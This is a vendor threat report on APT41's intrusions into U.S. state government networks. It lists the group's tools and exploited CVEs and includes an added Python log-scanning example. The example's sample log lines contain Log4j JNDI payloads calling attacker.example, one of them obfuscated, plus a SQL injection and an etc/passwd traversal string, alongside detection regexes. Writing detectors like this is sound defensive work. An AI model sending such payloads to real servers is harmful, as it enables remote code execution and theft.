Threat Signal Report

APT41 Compromised Six U.S. State Government Networks

Description

FortiGuard Labs is aware of a report that threat actor APT41 compromised at least six networks belonging to U.S. state governments between May 2021 and February 2022. To gain a foothold in the victims' networks, the threat actor used a number of different attack vectors: exploiting vulnerable Internet-facing web applications and directory traversal vulnerabilities, performing SQL injection, and conducting deserialization attacks. The intent of APT41 appears to be reconnaissance, though how the stolen information is to be used has not yet been determined.

Why is this Significant?

This is significant because at least six U.S. state government systems were broken into and data was exfiltrated by APT41 as recently as February 2022. In addition, a zero-day vulnerability in the USAHerds application (CVE-2021-44207) as well as Log4j (CVE-2021-44228), among others, were exploited in the attacks.

What's the Detail of the Attack?

APT41 used several different methods to break into the targeted networks.

In one case, the group exploited a SQL injection vulnerability in an Internet-facing web application. In another, it exploited a then previously unknown vulnerability (CVE-2021-44207) in USAHerds, a web application used by agriculture officials to manage animal disease control and prevention, livestock identification and movement. APT41 also reportedly started to exploit the infamous Log4j vulnerability (CVE-2021-44228) within hours of Proof-of-Concept (PoC) code becoming available. Patches for both vulnerabilities are available.

Once successful in breaking into the victim's network, the threat actor performed reconnaissance and credential harvesting activities.
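The three web-facing vectors described above (Log4j JNDI lookups, SQL injection and directory traversal) all leave traces in web server access logs. The following is an added detection example, not code from the report or from FortiGuard; the log lines, IP addresses, hostnames and rule patterns are constructed assumptions, and the normalizer collapses the nested-lookup and URL-encoding obfuscations before matching, since a literal "${jndi:" match alone misses them.

```python
import re
from urllib.parse import unquote
# Constructed sample access-log lines (not from the report). Lines 1-2 carry
# Log4j JNDI lookups (CVE-2021-44228), the second with the nested ${lower:..}
# obfuscation that Log4j itself resolves; line 3 is SQL injection, line 4
# directory traversal, line 5 benign. Hostnames are placeholders.
SAMPLE_LOGS = [
    '10.0.0.5 - - [05/Jan/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [05/Jan/2022:10:01:09 +0000] "GET /api?x=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 400 0 "-" "curl/7.0"',
    '10.0.0.7 - - [05/Jan/2022:10:02:00 +0000] "GET /herds?id=1%27%20OR%201%3D1-- HTTP/1.1" 500 0 "-" "Mozilla"',
    '10.0.0.8 - - [05/Jan/2022:10:02:30 +0000] "GET /static/..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0 "-" "Mozilla"',
    '10.0.0.9 - - [05/Jan/2022:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla"',
]

# Log4j resolves ${lower:x}/${upper:x} to x and ${name:-x} to the default x,
# so attackers nest them to hide the literal "${jndi:"; collapse them first.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

def normalize(line):
    """Repeat URL-decoding and lookup collapsing until the text stops changing."""
    prev = None
    while prev != line:
        prev = line
        line = unquote(line)
        line = _CASE_LOOKUP.sub(lambda m: m.group(1), line)
        line = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), line)
    return line.lower()

# Detection rules, applied to the normalized (decoded, lowercased) line.
RULES = {
    "directory_traversal": re.compile(r"(\.\./|\.\.\\){2,}"),
    "log4j_jndi": re.compile(r"\$\{jndi:"),
    "sql_injection": re.compile(r"'\s*(or|and)\s+\d+\s*=\s*\d+|union\s+select"),
}

def classify(line):
    """Return the sorted names of the rules that fire on one log line."""
    norm = normalize(line)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

def scan(lines):
    """Return (client_ip, [rule names]) for every line that triggers a rule."""
    hits = []
    for line in lines:
        tags = classify(line)
        if tags:
            hits.append((line.split()[0], tags))
    return hits
```

Running scan(SAMPLE_LOGS) flags the first four constructed lines and leaves the benign one alone; in production the rules should be tuned against the application's real traffic to keep false positives down.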

What is APT41?

APT41 is a threat actor that has been active since at least 2012. Also known as TA415, Double Dragon, Barium, GREF and WickedPanda, the group reportedly performs Chinese state-sponsored espionage activities. APT41 targets organizations in multiple countries across a wide range of industries, such as telecommunications, industrial and engineering, and think tanks. In 2020, five alleged members of the group were charged by the U.S. Justice Department for hacking more than 100 companies in the United States.

What are the Tools Used by APT41?

APT41 is known to use the following tools:

ASPXSpy - web shell backdoor

BITSAdmin - PowerShell cmdlets for creating and managing file transfers

BLACKCOFFEE - backdoor that disguises its communications as benign traffic to legitimate websites

certutil - command-line utility used for manipulating certification authority (CA) data and components

China Chopper - web shell backdoor that gives an attacker remote access to an enterprise network

Cobalt Strike - commercial penetration testing tool that allows users to perform a wide range of activities

Derusbi - DLL backdoor

Empire - PowerShell post-exploitation agent that provides users with a wide range of attack activities

gh0st RAT - Remote Access Trojan (RAT)

MESSAGETAP - data mining malware

Mimikatz - open-source credential dumper

njRAT - Remote Access Trojan (RAT)

PlugX - Remote Access Trojan (RAT)

PowerSploit - open-source offensive security framework that allows users to perform a wide range of activities

ROCKBOOT - bootkit

ShadowPad - backdoor

Winnti for Linux - Remote Access Trojan (RAT) for Linux

ZxShell - Remote Access Trojan (RAT)

BadPotato - open-source tool that allows a user to elevate privileges to SYSTEM

DustPan (aka StealthVector) - shellcode loader

DEADEYE - downloader

LOWKEY - backdoor

KEYPLUG - backdoor

What are Other Vulnerabilities Known to be Exploited by APT41?

APT41 has exploited the following vulnerabilities, among others, in the past:

CVE-2020-10189 (ManageEngine Desktop Central remote code execution vulnerability)

CVE-2019-19781 (Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance)

CVE-2019-3396 (Atlassian Confluence Widget Connector Macro Velocity Template Injection)

CVE-2017-11882 (Microsoft Office Memory Corruption Vulnerability)

CVE-2017-0199 (Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows)

CVE-2015-1641 (Microsoft Office Memory Corruption Vulnerability)

CVE-2012-0158 (MSCOMCTL.OCX RCE Vulnerability)

Are Patches Available for those Vulnerabilities?

Yes, patches are available for the vulnerabilities.

What is the Status of Coverage?

FortiGuard Labs has the following AV signatures in place for this issue:


FortiGuard Labs provides the following IPS coverage against vulnerabilities exploited by APT41:

Apache.Log4j.Error.Log.Remote.Code.Execution (CVE-2021-4104 CVE-2021-45046 CVE-2021-44228)

ZOHO.ManageEngine.DC.getChartImage.Remote.Code.Execution (CVE-2020-10189)

Citrix.Application.Delivery.Controller.VPNs.Directory.Traversal (CVE-2019-19781)

Confluence.Widget.Connector.macro.Path.Traversal (CVE-2019-3396)

MS.Office.EQNEDT32.EXE.Equation.Parsing.Memory.Corruption (CVE-2017-11882 CVE-2018-0798 CVE-2018-0802)

MS.Office.RTF.File.OLE.autolink.Code.Execution (CVE-2017-0199 CVE-2017-8570)

MS.Office.RTF.Array.Out.of.bounds.Memory.Corruption (CVE-2015-1641)

MS.Windows.MSCOMCTL.ActiveX.Control.Remote.Code.Execution (CVE-2012-0158)

MS.Windows.MSCOMCTL.ActiveX.Control.Code.Execution (CVE-2012-0158)

All network IOCs are blocked by the WebFiltering client.


Traffic Light Protocol

Color | When should it be used? | How may it be shared?

TLP:RED - Not for disclosure, restricted to participants only.
Sources may use TLP:RED when information cannot be effectively acted upon by additional parties, and could lead to impacts on a party's privacy, reputation, or operations if misused. Recipients may not share TLP:RED information with any parties outside of the specific exchange, meeting, or conversation in which it was originally disclosed. In the context of a meeting, for example, TLP:RED information is limited to those present at the meeting. In most circumstances, TLP:RED should be exchanged verbally or in person.

TLP:AMBER - Limited disclosure, restricted to participants' organizations.
Sources may use TLP:AMBER when information requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Recipients may only share TLP:AMBER information with members of their own organization, and with clients or customers who need to know the information to protect themselves or prevent further harm. Sources are at liberty to specify additional intended limits of the sharing: these must be adhered to.

TLP:GREEN - Limited disclosure, restricted to the community.
Sources may use TLP:GREEN when information is useful for the awareness of all participating organizations as well as with peers within the broader community or sector. Recipients may share TLP:GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels. Information in this category can be circulated widely within a particular community. TLP:GREEN information may not be released outside of the community.

TLP:WHITE - Disclosure is not limited.
Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction.